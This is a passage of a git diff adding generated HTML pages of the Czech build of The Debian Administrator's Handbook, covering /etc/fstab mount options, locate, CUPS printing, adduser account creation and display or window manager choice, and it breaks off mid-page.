+                class="filename">/dev/sdc1</code> partition, which has an ext3 filesystem, into the <code
+                class="filename">/mnt/tmp/</code> directory, you would simply run <code
+                class="command">mount -t ext3 /dev/sdc1 /mnt/tmp/</code>.
+			</div></div><div
+            class="para">
+				The <code
+              class="filename">/etc/fstab</code> file gives a list of all possible mounts that happen either automatically on boot or manually for removable storage devices. Each mount point is described by a line with several space-separated fields: <a
+              id="id-1.11.13.7.5.2"
+              class="indexterm"></a> <a
+              id="id-1.11.13.7.5.3"
+              class="indexterm"></a>
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						file system: this indicates where the filesystem to be mounted can be found, it can be a local device (hard drive partition, CD-ROM) or a remote filesystem (such as NFS).
+					</div><div
+                  class="para">
+						This field is frequently replaced with the unique ID of the filesystem (which you can determine with <code
+                    class="command">blkid <strong
+                      class="userinput"><code>device</code></strong></code>) prefixed with <code
+                    class="literal">UUID=</code>. This guards against a change in the name of the device in the event of addition or removal of disks, or if disks are detected in a different order.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						mount point: this is the location on the local filesystem where the device, remote system, or partition will be mounted.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						type: this field defines the filesystem used on the mounted device. <code
+                    class="literal">ext4</code>, <code
+                    class="literal">ext3</code>, <code
+                    class="literal">vfat</code>, <code
+                    class="literal">ntfs</code>, <code
+                    class="literal">btrfs</code>, <code
+                    class="literal">xfs</code> are a few examples.
+					</div><div
+                  class="sidebar"><div
+                    class="titlepage"><div><div><p
+                          class="title"><strong><span
+                              class="emphasis"><em>BACK TO BASICS</em></span> NFS, a network filesystem</strong></p></div></div></div><div
+                    class="para">
+						NFS is a network filesystem; under Linux, it allows transparent access to remote files by including them in the local filesystem.
+					</div></div><div
+                  class="para">
+						A complete list of known filesystems is available in the <span
+                    class="citerefentry"><span
+                      class="refentrytitle">mount</span>(8)</span> man page. The <code
+                    class="literal">swap</code> special value is for swap partitions; the <code
+                    class="literal">auto</code> special value tells the <code
+                    class="command">mount</code> program to automatically detect the filesystem (which is especially useful for disk readers and USB keys, since each one might have a different filesystem);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						options: there are many of them, depending on the filesystem, and they are documented in the <code
+                    class="command">mount</code> man page. The most common are
+					</div><div
+                  class="itemizedlist"><ul><li
+                      class="listitem"><div
+                        class="para">
+								<code
+                          class="literal">rw</code> or <code
+                          class="literal">ro</code>, meaning, respectively, that the device will be mounted with read/write or read-only permissions.
+							</div></li><li
+                      class="listitem"><div
+                        class="para">
+								<code
+                          class="literal">noauto</code> deactivates automatic mounting on boot.
+							</div></li><li
+                      class="listitem"><div
+                        class="para">
+								<code
+                          class="literal">nofail</code> allows the boot to proceed even when the device is not present. Make sure to put this option for external drives that might be unplugged when you boot, because <code
+                          class="command">systemd</code> really ensures that all mount points that must be automatically mounted are actually mounted before letting the boot process continue to its end. Note that you can combine this with <code
+                          class="literal">x-systemd.device-timeout=5s</code> to tell <code
+                          class="command">systemd</code> to not wait more than 5 seconds for the device to appear (see <span
+                          class="citerefentry"><span
+                            class="refentrytitle">systemd.mount</span>(5)</span>).
+							</div></li><li
+                      class="listitem"><div
+                        class="para">
+								<code
+                          class="literal">user</code> authorizes all users to mount this filesystem (an operation which would otherwise be restricted to the root user).
+							</div></li><li
+                      class="listitem"><div
+                        class="para">
+								<code
+                          class="literal">defaults</code> means the group of default options: <code
+                          class="literal">rw</code>, <code
+                          class="literal">suid</code>, <code
+                          class="literal">dev</code>, <code
+                          class="literal">exec</code>, <code
+                          class="literal">auto</code>, <code
+                          class="literal">nouser</code> and <code
+                          class="literal">async</code>, each of which can be individually disabled after <code
+                          class="literal">defaults</code> by adding <code
+                          class="literal">nosuid</code>, <code
+                          class="literal">nodev</code> and so on to block <code
+                          class="literal">suid</code>, <code
+                          class="literal">dev</code> and so on. Adding the <code
+                          class="literal">user</code> option reactivates it, since <code
+                          class="literal">defaults</code> includes <code
+                          class="literal">nouser</code>.
+							</div></li></ul></div></li><li
+                class="listitem"><div
+                  class="para">
+						dump: this field is almost always set to <code
+                    class="literal">0</code>. When it is <code
+                    class="literal">1</code>, it tells the <code
+                    class="command">dump</code> tool that the partition contains data that is to be backed up.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						pass: this last field indicates whether the integrity of the filesystem should be checked on boot, and in which order this check should be executed. If it is <code
+                    class="literal">0</code>, no check is conducted. The root filesystem should have the value <code
+                    class="literal">1</code>, while other permanent filesystems get the value <code
+                    class="literal">2</code>.
+					</div></li></ul></div><div
+            class="example"><a
+              xmlns=""
+              id="example.fstab"></a><p
+              class="title"><strong>Příklad 8.6. Example <code
+                  class="filename">/etc/fstab</code> file</strong></p><div
+              class="example-contents"><pre
+                class="programlisting">
+# /etc/fstab: static file system information.
+#
+# &lt;file system&gt; &lt;mount point&gt;   &lt;type&gt;  &lt;options&gt;       &lt;dump&gt;  &lt;pass&gt;
+proc            /proc           proc    defaults        0       0
+# / was on /dev/sda1 during installation
+UUID=c964222e-6af1-4985-be04-19d7c764d0a7 / ext3 errors=remount-ro 0 1
+# swap was on /dev/sda5 during installation
+UUID=ee880013-0f63-4251-b5c6-b771f53bd90e none swap sw  0       0
+/dev/scd0       /media/cdrom0   udf,iso9660 user,noauto 0       0
+/dev/fd0        /media/floppy   auto    rw,user,noauto  0       0
+arrakis:/shared /shared         nfs     defaults        0       0
+</pre></div></div><div
+            class="para">
+				The last entry in this example corresponds to a network filesystem (NFS): the <code
+              class="filename">/shared/</code> directory on the <span
+              class="emphasis"><em>arrakis</em></span> server is mounted at <code
+              class="filename">/shared/</code> on the local machine. The format of the <code
+              class="filename">/etc/fstab</code> file is documented on the <span
+              class="citerefentry"><span
+                class="refentrytitle">fstab</span>(5)</span> man page.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> Auto-mounting</strong></p></div></div></div><div
+              class="para">
+				systemd is able to manage automount points: those are filesystems that are mounted on-demand when a user attempts to access their target mount points. It can also unmount these filesystems when no process is accessing them any longer.
+			</div><div
+              class="para">
+				Like most concepts in systemd, automount points are managed with dedicated units (using the <code
+                class="literal">.automount</code> suffix). See <span
+                class="citerefentry"><span
+                  class="refentrytitle">systemd.automount</span>(5)</span> for their precise syntax.
+			</div><a
+              id="id-1.11.13.7.9.4"
+              class="indexterm"></a><a
+              id="id-1.11.13.7.9.5"
+              class="indexterm"></a><a
+              id="id-1.11.13.7.9.6"
+              class="indexterm"></a><a
+              id="id-1.11.13.7.9.7"
+              class="indexterm"></a><a
+              id="id-1.11.13.7.9.8"
+              class="indexterm"></a><div
+              class="para">
+				Other auto-mounting utilities exist, such as <code
+                class="command">automount</code> in the <span
+                class="pkg pkg">autofs</span> package or <code
+                class="command">amd</code> in the <span
+                class="pkg pkg">am-utils</span>.
+			</div><div
+              class="para">
+				Note also that GNOME, Plasma, and other graphical desktop environments work together with <span
+                class="emphasis"><em>udisks</em></span>, and can automatically mount removable media when they are connected.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.locate-updatedb"></a>8.9.6. <code
+                    class="command">locate</code> and <code
+                    class="command">updatedb</code></h3></div></div></div><a
+            id="id-1.11.13.8.2"
+            class="indexterm"></a><a
+            id="id-1.11.13.8.3"
+            class="indexterm"></a><a
+            id="id-1.11.13.8.4"
+            class="indexterm"></a><div
+            class="para">
+				The <code
+              class="command">locate</code> command can find the location of a file when you only know part of the name. It sends a result almost instantaneously, since it consults a database that stores the location of all the files on the system; this database is updated daily by the <code
+              class="command">updatedb</code> command. There are multiple implementations of the <code
+              class="command">locate</code> command and Debian picked <span
+              class="pkg pkg">mlocate</span> for its standard system.
+			</div><div
+            class="para">
+				<code
+              class="command">mlocate</code> is smart enough to only return files which are accessible to the user running the command even though it uses a database that knows about all files on the system (since its <code
+              class="command">updatedb</code> implementation runs with root rights). For extra safety, the administrator can use <code
+              class="varname">PRUNEDPATHS</code> in <code
+              class="filename">/etc/updatedb.conf</code> to exclude some directories from being indexed.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.config-bootloader.html"><strong>Předcházející</strong>8.8. Configuring the Bootloader</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.kernel-compilation.html"><strong>Další</strong>8.10. Compiling a Kernel</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.config-printing.html b/tmp/cs-CZ/html/sect.config-printing.html
new file mode 100644
index 000000000..f6d79fbb2
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.config-printing.html
@@ -0,0 +1,150 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">8.7. Printer Configuration</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="prev"
+        href="sect.shell-environment.html"
+        title="8.6. Shell Environment" /><link
+        rel="next"
+        href="sect.config-bootloader.html"
+        title="8.8. Configuring the Bootloader" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.config-printing.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.shell-environment.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.config-bootloader.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.config-printing"></a>8.7. Printer Configuration</h2></div></div></div><a
+          id="id-1.11.11.2"
+          class="indexterm"></a><a
+          id="id-1.11.11.3"
+          class="indexterm"></a><div
+          class="para">
+			Printer configuration used to cause a great many headaches for administrators and users alike. These headaches are now mostly a thing of the past, thanks to <span
+            class="pkg pkg">cups</span>, the free print server using the IPP protocol (Internet Printing Protocol).
+		</div><a
+          id="id-1.11.11.5"
+          class="indexterm"></a><a
+          id="id-1.11.11.6"
+          class="indexterm"></a><a
+          id="id-1.11.11.7"
+          class="indexterm"></a><div
+          class="para">
+			This program is divided over several Debian packages: <span
+            class="pkg pkg">cups</span> is the central print server; <span
+            class="pkg pkg">cups-bsd</span> is a compatibility layer allowing use of commands from the traditional BSD printing system (<code
+            class="command">lpd</code> daemon, <code
+            class="command">lpr</code> and <code
+            class="command">lpq</code> commands, etc.); <span
+            class="pkg pkg">cups-client</span> contains a group of programs to interact with the server (block or unblock a printer, view or delete print jobs in progress, etc.); and finally, <span
+            class="pkg pkg">printer-driver-gutenprint</span> contains a collection of additional printer drivers for <code
+            class="command">cups</code>.
+		</div><a
+          id="id-1.11.11.9"
+          class="indexterm"></a><a
+          id="id-1.11.11.10"
+          class="indexterm"></a><a
+          id="id-1.11.11.11"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>COMMUNITY</em></span> CUPS</strong></p></div></div></div><a
+            id="id-1.11.11.12.2"
+            class="indexterm"></a><a
+            id="id-1.11.11.12.3"
+            class="indexterm"></a><div
+            class="para">
+			CUPS (Common Unix Printing System) is a project (and a trademark) managed by Apple, Inc. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="http://www.cups.org/">http://www.cups.org/</a></div>
+		</div></div><div
+          class="para">
+			After installation of these different packages, <code
+            class="command">cups</code> is administered easily through a web interface accessible at the local address: <code
+            class="literal">http://localhost:631/</code>. There you can add printers (including network printers), remove, and administer them. You can also administer <code
+            class="command">cups</code> with the graphical interface provided by the desktop environment. Finally, there is also the <code
+            class="command">system-config-printer</code> graphical interface (from the Debian package of the same name).
+		</div><a
+          id="id-1.11.11.14"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>NOTE</em></span> Obsolescence of <code
+                      class="filename">/etc/printcap</code></strong></p></div></div></div><div
+            class="para">
+			<span
+              class="emphasis"><em>cups</em></span> no longer uses the <code
+              class="filename">/etc/printcap</code> file, which is now obsolete. Programs that rely upon this file to get a list of available printers will, thus, fail. To avoid this problem, delete this file and make it a symbolic link (see sidebar <a
+              class="xref"
+              href="sect.config-misc.html#sidebar.symbolic-link"><span
+                class="emphasis"><em>BACK TO BASICS</em></span> Symbolic links</a>) to <code
+              class="filename">/run/cups/printcap</code>, which is maintained by <span
+              class="emphasis"><em>cups</em></span> to ensure compatibility.
+		</div><a
+            id="id-1.11.11.15.3"
+            class="indexterm"></a></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.shell-environment.html"><strong>Předcházející</strong>8.6. Shell Environment</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.config-bootloader.html"><strong>Další</strong>8.8. Configuring the Bootloader</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.creating-accounts.html b/tmp/cs-CZ/html/sect.creating-accounts.html
new file mode 100644
index 000000000..4e21215a8
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.creating-accounts.html
@@ -0,0 +1,158 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">8.5. Creating Accounts</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="prev"
+        href="sect.user-group-databases.html"
+        title="8.4. User and Group Databases" /><link
+        rel="next"
+        href="sect.shell-environment.html"
+        title="8.6. Shell Environment" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.creating-accounts.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.user-group-databases.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.shell-environment.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.creating-accounts"></a>8.5. Creating Accounts</h2></div></div></div><a
+          id="id-1.11.9.2"
+          class="indexterm"></a><a
+          id="id-1.11.9.3"
+          class="indexterm"></a><div
+          class="para">
+			One of the first actions an administrator needs to do when setting up a new machine is to create user accounts. This is typically done using the <code
+            class="command">adduser</code> command which takes a user-name for the new user to be created, as an argument.
+		</div><a
+          id="id-1.11.9.5"
+          class="indexterm"></a><div
+          class="para">
+			The <code
+            class="command">adduser</code> command asks a few questions before creating the account, but its usage is fairly straightforward. Its configuration file, <code
+            class="filename">/etc/adduser.conf</code>, includes all the interesting settings: it can be used to automatically set a quota for each new user by creating a user template, or to change the location of user accounts; the latter is rarely useful, but it comes in handy when you have a large number of users and want to divide their accounts over several disks, for instance. You can also choose a different default shell.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Quota</strong></p></div></div></div><a
+            id="id-1.11.9.7.2"
+            class="indexterm"></a><div
+            class="para">
+			The term “quota” refers to a limit on machine resources that a user is allowed to use. This frequently refers to disk space.
+		</div></div><div
+          class="para">
+			The creation of an account populates the user's home directory with the contents of the <code
+            class="filename">/etc/skel/</code> template. This provides the user with a set of standard directories and configuration files.
+		</div><a
+          id="id-1.11.9.9"
+          class="indexterm"></a><a
+          id="id-1.11.9.10"
+          class="indexterm"></a><div
+          class="para">
+			In some cases, it will be useful to add a user to a group (other than their default “main” group) in order to grant them additional permissions. For example, a user who is included in the <span
+            class="emphasis"><em>audio</em></span> group can access audio devices (see sidebar <a
+            class="xref"
+            href="sect.creating-accounts.html#sidebar.special-files"><span
+              class="emphasis"><em>BACK TO BASICS</em></span> Device access permissions</a>). This can be achieved with a command such as <code
+            class="command">adduser <em
+              class="replaceable">user</em> <em
+              class="replaceable">group</em></code>.
+		</div><div
+          class="sidebar"><a
+            xmlns=""
+            id="sidebar.special-files"></a><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Device access permissions</strong></p></div></div></div><a
+            id="id-1.11.9.12.2"
+            class="indexterm"></a><a
+            id="id-1.11.9.12.3"
+            class="indexterm"></a><a
+            id="id-1.11.9.12.4"
+            class="indexterm"></a><a
+            id="id-1.11.9.12.5"
+            class="indexterm"></a><a
+            id="id-1.11.9.12.6"
+            class="indexterm"></a><a
+            id="id-1.11.9.12.7"
+            class="indexterm"></a><a
+            id="id-1.11.9.12.8"
+            class="indexterm"></a><a
+            id="id-1.11.9.12.9"
+            class="indexterm"></a><div
+            class="para">
+			Each hardware peripheral device is represented under Unix with a special file, usually stored in the file tree under <code
+              class="filename">/dev/</code> (DEVices). Two types of special files exist according to the nature of the device: “character mode” and “block mode” files, each mode allowing for only a limited number of operations. While character mode limits interaction with read/write operations, block mode also allows seeking within the available data. Finally, each special file is associated with two numbers (“major” and “minor”) that identify the device to the kernel in a unique manner. Such a file, created by the <code
+              class="command">mknod</code> command, simply contains a symbolic (and more human-friendly) name.
+		</div><div
+            class="para">
+			The permissions of a special file map to the permissions necessary to access the device itself. Thus, a file such as <code
+              class="filename">/dev/mixer</code>, representing the audio mixer, only has read/write permissions for the root user and members of the <code
+              class="literal">audio</code> group. Only these users can operate the audio mixer.
+		</div><div
+            class="para">
+			It should be noted that the combination of <span
+              class="pkg pkg">udev</span>, <span
+              class="pkg pkg">consolekit</span> and <span
+              class="pkg pkg">policykit</span> can add additional permissions to allow users physically connected to the console (and not through the network) to access to certain devices.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.user-group-databases.html"><strong>Předcházející</strong>8.4. User and Group Databases</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.shell-environment.html"><strong>Další</strong>8.6. Shell Environment</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.customizing-graphical-interface.html b/tmp/cs-CZ/html/sect.customizing-graphical-interface.html
new file mode 100644
index 000000000..89319007c
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.customizing-graphical-interface.html
@@ -0,0 +1,238 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">13.2. Customizing the Graphical Interface</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Workstation, Graphical desktop, Office work, X.org" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><link
+        rel="prev"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><link
+        rel="next"
+        href="sect.graphical-desktops.html"
+        title="13.3. Graphical Desktops" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.customizing-graphical-interface.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="workstation.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.graphical-desktops.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.customizing-graphical-interface"></a>13.2. Customizing the Graphical Interface</h2></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.5.2"></a>13.2.1. Choosing a Display Manager</h3></div></div></div><a
+            id="id-1.16.5.2.2"
+            class="indexterm"></a><a
+            id="id-1.16.5.2.3"
+            class="indexterm"></a><a
+            id="id-1.16.5.2.4"
+            class="indexterm"></a><a
+            id="id-1.16.5.2.5"
+            class="indexterm"></a><div
+            class="para">
+				The graphical interface only provides display space. Running the X server by itself only leads to an empty screen, which is why most installations use a <span
+              class="emphasis"><em>display manager</em></span> to display a user authentication screen and start the graphical desktop once the user has authenticated. The three most popular display managers in current use are <span
+              class="pkg pkg">gdm3</span> (<span
+              class="foreignphrase"><em
+                class="foreignphrase">GNOME Display Manager</em></span>), <span
+              class="pkg pkg">sddm</span> (suggested for KDE Plasma) and <span
+              class="pkg pkg">lightdm</span> (<span
+              class="foreignphrase"><em
+                class="foreignphrase">Light Display Manager</em></span>). Since the Falcot Corp administrators have opted to use the GNOME desktop environment, they logically picked <code
+              class="command">gdm3</code> as a display manager too. The <code
+              class="filename">/etc/gdm3/daemon.conf</code> configuration file has many options (the list can be found in the <code
+              class="filename">/usr/share/gdm/gdm.schemas</code> schema file) to control its behaviour while <code
+              class="filename">/etc/gdm3/greeter.dconf-defaults</code> contains settings for the greeter “session” (more than just a login window, it is a limited desktop with power management and accessibility related tools). Note that some of the most useful settings for end-users can be tweaked with GNOME's control center.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.5.3"></a>13.2.2. Choosing a Window Manager</h3></div></div></div><div
+            class="para">
+				Since each graphical desktop provides its own window manager, which window manager you choose is usually influenced by which desktop you have selected. GNOME uses the <code
+              class="command">mutter</code> window manager, Plasma uses <code
+              class="command">kwin</code>, and Xfce (which we present later) has <code
+              class="command">xfwm</code>. The Unix philosophy always allows using one's window manager of choice, but following the recommendations allows an administrator to best take advantage of the integration efforts led by each project.
+			</div><a
+            id="id-1.16.5.3.3"
+            class="indexterm"></a><a
+            id="id-1.16.5.3.4"
+            class="indexterm"></a><a
+            id="id-1.16.5.3.5"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> Window manager</strong></p></div></div></div><a
+              id="id-1.16.5.3.6.2"
+              class="indexterm"></a><a
+              id="id-1.16.5.3.6.3"
+              class="indexterm"></a><div
+              class="para">
+				The window manager displays the “decorations” around the windows belonging to the currently running applications, which includes frames and the title bar. It also allows reducing, restoring, maximizing, and hiding windows. Most window managers also provide a menu that pops up when the desktop is clicked in a specific way. This menu provides the means to close the window manager session, start new applications, and in some cases, change to another window manager (if installed).
+			</div></div><div
+            class="para">
+				Older computers may, however, have a hard time running heavyweight graphical desktop environments. In these cases, a lighter configuration should be used. “Light” (or small footprint) window managers include WindowMaker (in the <span
+              class="pkg pkg">wmaker</span> package), Afterstep, fvwm, icewm, blackbox, fluxbox, or openbox. In these cases, the system should be configured so that the appropriate window manager gets precedence; the standard way is to change the <code
+              class="command">x-window-manager</code> alternative with the command <code
+              class="command">update-alternatives --config x-window-manager</code>.
+			</div><a
+            id="id-1.16.5.3.8"
+            class="indexterm"></a><a
+            id="id-1.16.5.3.9"
+            class="indexterm"></a><a
+            id="id-1.16.5.3.10"
+            class="indexterm"></a><a
+            id="id-1.16.5.3.11"
+            class="indexterm"></a><a
+            id="id-1.16.5.3.12"
+            class="indexterm"></a><a
+            id="id-1.16.5.3.13"
+            class="indexterm"></a><a
+            id="id-1.16.5.3.14"
+            class="indexterm"></a><div
+            class="sidebar"><a
+              xmlns=""
+              id="sidebar.alternatives"></a><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>DEBIAN SPECIFICITY</em></span> Alternatives</strong></p></div></div></div><a
+              id="id-1.16.5.3.15.2"
+              class="indexterm"></a><a
+              id="id-1.16.5.3.15.3"
+              class="indexterm"></a><a
+              id="id-1.16.5.3.15.4"
+              class="indexterm"></a><div
+              class="para">
+				The Debian policy lists a number of standardized commands able to perform a particular action. For example, the <code
+                class="command">x-window-manager</code> command invokes a window manager. But Debian does not assign this command to a fixed window manager. The administrator can choose which manager it should invoke.
+			</div><div
+              class="para">
+				For each window manager, the relevant package therefore registers the appropriate command as a possible choice for <code
+                class="command">x-window-manager</code> along with an associated priority. Barring explicit configuration by the administrator, this priority allows picking the best installed window manager when the generic command is run.
+			</div><div
+              class="para">
+				Both the registration of commands and the explicit configuration involve the <code
+                class="command">update-alternatives</code> script. Choosing where a symbolic command points at is a simple matter of running <code
+                class="command">update-alternatives --config <em
+                  class="replaceable">symbolic-command</em></code>. The <code
+                class="command">update-alternatives</code> script creates (and maintains) symbolic links in the <code
+                class="filename">/etc/alternatives/</code> directory, which in turn references the location of the executable. As time passes, packages are installed or removed, and/or the administrator makes explicit changes to the configuration. When a package providing an alternative is removed, the alternative automatically goes to the next best choice among the remaining possible commands.
+			</div><div
+              class="para">
+				Not all symbolic commands are explicitly listed by the Debian policy; some Debian package maintainers deliberately chose to use this mechanism in less straightforward cases where it still brings interesting flexibility (examples include <code
+                class="command">x-www-browser</code>, <code
+                class="command">www-browser</code>, <code
+                class="command">cc</code>, <code
+                class="command">c++</code>, <code
+                class="command">awk</code>, and so on).
+			</div><a
+              id="id-1.16.5.3.15.9"
+              class="indexterm"></a><a
+              id="id-1.16.5.3.15.10"
+              class="indexterm"></a><a
+              id="id-1.16.5.3.15.11"
+              class="indexterm"></a><a
+              id="id-1.16.5.3.15.12"
+              class="indexterm"></a><a
+              id="id-1.16.5.3.15.13"
+              class="indexterm"></a></div></div><div
